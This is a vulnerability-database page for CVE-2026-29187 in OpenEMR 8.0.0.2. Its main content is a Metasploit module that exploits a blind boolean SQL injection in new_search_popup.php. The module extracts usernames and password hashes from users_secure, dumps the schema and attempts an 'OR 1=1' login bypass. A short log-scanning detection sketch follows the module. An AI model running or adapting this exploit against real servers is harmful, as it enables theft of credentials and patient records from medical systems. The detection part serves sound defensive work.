
OpenEMR 8.0.0.2 SQL Injection

๐Ÿ—“๏ธย 20 Apr 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 80ย Views

OpenEMR 8.0.0.2 SQL injection exploitation tool for CVE-2026-29187.

Related

| Reporter | Title | Published | Views | Family |
|---|---|---|---|---|
| ATTACKERKB | CVE-2026-29187 | 25 Mar 2026 22:24 | – | attackerkb |
| Circl | CVE-2026-29187 | 25 Mar 2026 23:20 | – | circl |
| CNNVD | OpenEMR SQL injection vulnerability | 25 Mar 2026 00:00 | – | cnnvd |
| CVE | CVE-2026-29187 | 25 Mar 2026 22:24 | – | cve |
| Cvelist | CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php | 25 Mar 2026 22:24 | – | cvelist |
| EUVD | EUVD-2026-16008 | 25 Mar 2026 22:24 | – | euvd |
| NVD | CVE-2026-29187 | 25 Mar 2026 23:17 | – | nvd |
| OSV | CVE-2026-29187 OpenEMR Vulnerable to Authenticated Blind Boolean-Based SQL Injection in new_search_popup.php | 25 Mar 2026 22:24 | – | osv |
| Packet Storm | OpenEMR 8.0.0.2 SQL Injection | 26 Mar 2026 00:00 | – | packetstorm |
| Positive Technologies | PT-2026-28135 | 25 Mar 2026 00:00 | – | ptsecurity |

Code

==================================================================================================================================
    | # Title     : OpenEMR 8.0.0.2 Exploitation Tool                                                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads                                                        |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets a potential SQL Injection vulnerability in an OpenEMR installation (CVE-2026-29187). 
                     It is designed for controlled security assessment and supports multiple exploitation and enumeration actions.
    
    [+] POC        :  
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Report
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(update_info(info,
          'Name' => 'OpenEMR CVE-2026-29187 SQL Injection Exploit ',
          'Description' => 'OpenEMR 8.0.0.2 Exploitation Tool',
          'Author' => ['indoushka'],
          'License' => MSF_LICENSE,
          'References' => [['CVE', '2026-29187']]
        ))
    
        register_options([
          Opt::RPORT(443),
          OptBool.new('SSL', [true, 'SSL', true]),
          OptString.new('TARGETURI', [true, 'Path', '/openemr/']),
          OptInt.new('TIMEOUT', [true, 'Timeout', 10]),
          OptEnum.new('ACTION', [
            true,
            'Action',
            'DUMP_USERS',
            'DUMP_SCHEMA',
            'AUTH_BYPASS',
            'GET_SHELL'
          ])
        ])
    
        @results = []
      end
    
      def uri(path)
        normalize_uri(datastore['TARGETURI'], path)
      end
    
      def inject_sql(payload)
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => uri('interface/new/new_search_popup.php'),
          'vars_get' => { "mf_(#{payload})" => '1' },
          'timeout' => datastore['TIMEOUT']
        })
    
        return false unless res
        res.body.to_s.include?('SQL') || res.body.to_s.include?('error')
      rescue
        false
      end
    
      def extract_data(query)
        result = ""
    
        (1..50).each do |i|
          (32..126).each do |c|
            payload = "(SELECT IF(ASCII(SUBSTRING((#{query}),#{i},1))=#{c},'1','0'))"
    
            if inject_sql(payload)
              result << c.chr
              break
            end
          end
        end
    
        result.empty? ? nil : result
      end
    
      def run
        print_status("Starting OpenEMR SQLi module on #{rhost}")
    
        case datastore['ACTION']
        when 'DUMP_USERS'
          dump_users
        when 'DUMP_SCHEMA'
          dump_schema
        when 'AUTH_BYPASS'
          auth_bypass
        when 'GET_SHELL'
          get_shell
        end
      end
    
      def dump_users
        print_status("Dumping users...")
    
        count = extract_data("SELECT COUNT(*) FROM users_secure").to_i
        return print_error("No users found") if count <= 0
    
        (0...count).each do |i|
          user = extract_data("SELECT username FROM users_secure LIMIT #{i},1")
          pass = extract_data("SELECT password FROM users_secure LIMIT #{i},1")
    
          print_good("USER: #{user} PASS: #{pass}")
        end
      end
    
      def auth_bypass
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri('interface/main/main_screen.php'),
          'vars_post' => {
            'authUser' => "' OR 1=1 --",
            'clearPass' => 'x'
          }
        })
    
        if res && (res.code == 302 || res.body.to_s !~ /login/i)
          print_good("Auth bypass success")
        else
          print_error("Failed")
        end
      end
    
      def get_shell
        print_status("Shell method not safe in fixed version (disabled)")
      end
    
    end
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
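
A detection sketch for the request shape built by `inject_sql` above, where the SQL fragment travels in the GET parameter name after the `mf_` prefix on `new_search_popup.php`. This is an added example, not part of the original advisory or of OpenEMR; the Combined Log Format, the constructed sample lines, the benign name `mf_lname` and the rule that legitimate `mf_` names are plain identifiers are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Endpoint and "mf_" prefix come from the request built by inject_sql above.
ENDPOINT = "interface/new/new_search_popup.php"
PREFIX = "mf_"
# Assumption: legitimate mf_ parameter names are plain identifiers.
SAFE_NAME = re.compile(r"[A-Za-z0-9_]+")
# Assumption: Combined Log Format; captures client, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def suspicious_params(target):
    """Return decoded mf_ parameter names that are not plain identifiers."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return []
    names = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return [n for n in names if n.startswith(PREFIX) and not SAFE_NAME.fullmatch(n)]

def scan(lines):
    """Return (client, status, bad_names) for every log line that trips the check."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        bad = suspicious_params(target)
        if bad:
            hits.append((client, int(status), bad))
    return hits

def per_client(hits):
    """Count flagged requests per client; blind extraction shows up as a burst."""
    return Counter(client for client, _, _ in hits)

BASE = "/openemr/interface/new/new_search_popup.php"
SAMPLE = [  # constructed log lines using documentation address ranges
    f'198.51.100.7 - - [20/Apr/2026:10:00:01 +0000] "GET {BASE}?mf_lname=1 HTTP/1.1" 200 5120',
    f'203.0.113.9 - - [20/Apr/2026:10:00:02 +0000] "GET {BASE}?mf_%28SELECT%201%29=1 HTTP/1.1" 200 734',
    f'203.0.113.9 - - [20/Apr/2026:10:00:02 +0000] "GET {BASE}?mf_%28SELECT%202%29=1 HTTP/1.1" 200 734',
    '203.0.113.9 - - [20/Apr/2026:10:00:03 +0000] "GET /openemr/interface/login/login.php?site=default HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for client, n in per_client(scan(SAMPLE)).items():
        print(f"{client}: {n} request(s) with SQL-shaped mf_ parameter names")
```

Because the check runs on the decoded parameter name, percent-encoded and raw forms of the same request are flagged alike.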

20 Apr 2026 00:00 (current)
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 8.1 - 8.8
EPSS: 0.00473